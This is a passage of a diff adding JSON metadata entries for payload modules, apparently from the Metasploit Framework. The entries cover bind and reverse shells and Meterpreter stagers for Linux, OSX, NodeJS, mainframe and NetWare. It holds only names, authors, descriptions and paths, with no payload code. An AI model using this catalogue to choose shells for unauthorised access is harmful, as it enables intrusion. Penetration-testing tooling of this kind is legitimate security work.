"payload/linux/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + 
"platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_linux/x86/shell/bind_tcp_uuid": { + "name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_linux/x86/shell/find_tag": { + "name": "Linux Command Shell, Find Tag Stager", + "fullname": "payload/linux/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "x86", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_linux/x86/shell/reverse_ipv6_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/linux/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_linux/x86/shell/reverse_nonx_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_linux/x86/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_linux/x86/shell/reverse_tcp_uuid": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": 
null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_linux/x86/shell_bind_ipv6_tcp": { + "name": "Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/linux/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Listen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": 
"linux/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_bind_tcp_random_port": { + "name": "Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/linux/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_find_port", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_find_tag": { + "name": "Linux Command Shell, Find Tag Inline", + "fullname": "payload/linux/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle ", + "joev " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_reverse_tcp_ipv6": { + "name": "Linux Command Shell, Reverse TCP Inline 
(IPv6)", + "fullname": "payload/linux/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matteo Malvica " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam 
Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_mainframe/shell_reverse_tcp": { + "name": "Z/OS (MVS) Command Shell, Reverse TCP Inline", + "fullname": "payload/mainframe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Listen for a connection and spawn a command shell.\n This implementation does not include ebcdic character 
translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "mainframe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_multi/meterpreter/reverse_http": { + "name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)", + "fullname": "payload/multi/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves" + ], + "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Multi", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/multi/reverse_http.rb", + "is_install_path": true, + "ref_name": "multi/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "multi/meterpreter", + "stager_refname": "multi/reverse_http" + }, + "payload_multi/meterpreter/reverse_https": { + "name": 
"Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)", + "fullname": "payload/multi/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves" + ], + "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Multi", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/multi/reverse_https.rb", + "is_install_path": true, + "ref_name": "multi/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "multi/meterpreter", + "stager_refname": "multi/reverse_https" + }, + "payload_netware/shell/reverse_tcp": { + "name": "NetWare Command Shell, Reverse TCP Stager", + "fullname": "payload/netware/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "toto" + ], + "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Netware", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "netware/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": 
false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "netware/shell", + "stager_refname": "netware/reverse_tcp" + }, + "payload_nodejs/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via nodejs)", + "fullname": "payload/nodejs/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Creates an interactive shell via nodejs", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_nodejs/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via nodejs)", + "fullname": "payload/nodejs/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan", + "joev " + ], + "description": "Creates an interactive shell via nodejs", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_nodejs/shell_reverse_tcp_ssl": { + "name": "Command Shell, Reverse TCP SSL (via nodejs)", + "fullname": 
"payload/nodejs/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan", + "joev " + ], + "description": "Creates an interactive shell via nodejs, uses SSL", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/exec": { + "name": "OSX aarch64 Execute Command", + "fullname": "payload/osx/aarch64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-12-30 16:26:31 +0000", + "path": "/modules/payloads/singles/osx/aarch64/exec.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter/reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Stager", + "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + "usiegl00" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [ + 
"URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-07-31 20:30:30 +0000", + "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/aarch64/meterpreter", + "stager_refname": "osx/aarch64/reverse_tcp" + }, + "payload_osx/aarch64/meterpreter_reverse_http": { + "name": "OSX Meterpreter, Reverse HTTP Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter_reverse_https": { + "name": "OSX Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the 
Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter_reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/shell_bind_tcp": { + "name": "OS X x64 Shell Bind TCP", + "fullname": "payload/osx/aarch64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Bind an arbitrary command to an arbitrary port", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 
+ "mod_time": "2024-02-01 01:05:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/shell_reverse_tcp": { + "name": "OSX aarch64 Shell Reverse TCP", + "fullname": "payload/osx/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-02 14:13:07 +0000", + "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/armle/execute/bind_tcp": { + "name": "OS X Write and Execute Binary, Bind TCP Stager", + "fullname": "payload/osx/armle/execute/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/execute/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/execute", + "stager_refname": "osx/armle/bind_tcp" + }, + "payload_osx/armle/execute/reverse_tcp": { + "name": "OS X Write and Execute Binary, Reverse TCP Stager", + "fullname": "payload/osx/armle/execute/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/execute/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/execute", + "stager_refname": "osx/armle/reverse_tcp" + }, + "payload_osx/armle/shell/bind_tcp": { + "name": "OS X Command Shell, Bind TCP Stager", + "fullname": "payload/osx/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "OSX", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", + "is_install_path": true, + "ref_name": "osx/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/armle/shell", + 
